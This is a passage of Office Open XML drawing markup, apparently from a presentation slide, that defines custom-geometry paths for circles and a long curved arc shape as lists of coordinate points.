                  <a:lnTo>
                    <a:pt x="75945" y="4551718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103552" y="4545381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125825" y="4529485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140525" y="4506385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142590" y="4494580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73659" y="4466018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142169" y="4464249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139090" y="4450791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123205" y="4428493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100105" y="4413781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72135" y="4408893"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="142169" y="4464249"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73659" y="4466018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142904" y="4492788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145414" y="4478439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142169" y="4464249"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="142904" y="4492788"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142590" y="4494580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142904" y="4492788"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="140239" y="58837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142747" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184403" y="88518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295655" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405256" y="110998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513206" y="130175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619125" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723138" y="184276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824864" y="218693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924178" y="257937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021206" y="301751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115694" y="350138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207389" y="402971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296162" y="459866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382140" y="520953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464817" y="585977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544319" y="654812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620392" y="727455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692909" y="803528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761616" y="882903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826640" y="965708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887727" y="1051560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944751" y="1140460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997455" y="1232153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045715" y="1326641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089530" y="1423669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128773" y="1523111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="1624964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192654" y="1728851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217166" y="1834768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="1942591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2052319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258694" y="2163444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2261616" y="2276221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258694" y="2388869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2499995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="2609469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217039" y="2717291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192654" y="2823210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="2926969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128773" y="3028696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089530" y="3128010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045715" y="3225038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997455" y="3319399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944877" y="3411093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887981" y="3499866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826894" y="3585718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761997" y="3668395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693290" y="3747770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620773" y="3823843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544827" y="3896359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465452" y="3965321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382776" y="4030218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1297051" y="4091304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208277" y="4148201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116710" y="4201033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022350" y="4249420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925448" y="4293235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826007" y="4332478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724407" y="4367022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620521" y="4396613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514730" y="4421136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407034" y="4440529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297433" y="4454512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186308" y="4463110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142169" y="4464249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145414" y="4478439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142904" y="4492788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188467" y="4491596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300989" y="4482858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411988" y="4468647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521080" y="4448975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628395" y="4424133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733551" y="4394073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836548" y="4359148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937132" y="4319270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035303" y="4274820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130934" y="4225798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223771" y="4172330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313560" y="4114546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400428" y="4052697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484121" y="3986783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564513" y="3917061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641475" y="3843654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714880" y="3766566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1784477" y="3686048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850135" y="3602228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911984" y="3515359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969642" y="3425316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022855" y="3332353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071751" y="3236849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116201" y="3138551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155825" y="3037840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190622" y="2934843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220467" y="2829560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245232" y="2722245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264664" y="2613152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278760" y="2502154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287269" y="2389504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290064" y="2275459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287269" y="2161286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278633" y="2048637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264409" y="1937639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244979" y="1828418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220087" y="1720977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190368" y="1615693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155443" y="1512569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2115566" y="1411859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071242" y="1313561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022220" y="1217929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968753" y="1125092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911095" y="1035050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849119" y="948054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783206" y="864235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713483" y="783843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640077" y="706754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562989" y="633222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482470" y="563499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398651" y="497713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1311655" y="435863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221613" y="378205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128648" y="324738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033017" y="275716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934719" y="231393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833881" y="191515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730884" y="156844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625475" y="126873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518159" y="102108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408939" y="82676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297814" y="68452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185165" y="59943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="73151" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45237" y="4891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22145" y="19605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6268" y="41915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="69596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4891" y="97492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19605" y="120554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41915" y="136425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69595" y="142748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97492" y="137856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120554" y="123142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136425" y="100832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70992" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137856" y="45237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123142" y="22145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100832" y="6268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73151" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="71754" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70992" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142747" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4552315">
                  <a:moveTo>
                    <a:pt x="139943" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="5715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426458" y="3675125"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="228600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="466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75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426458" y="3675125"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229362"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362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426458" y="7379970"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="228600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="466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426458" y="7379970"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229361"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229361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336286" y="475868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336286" y="475868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317998" y="6276593"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="228600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
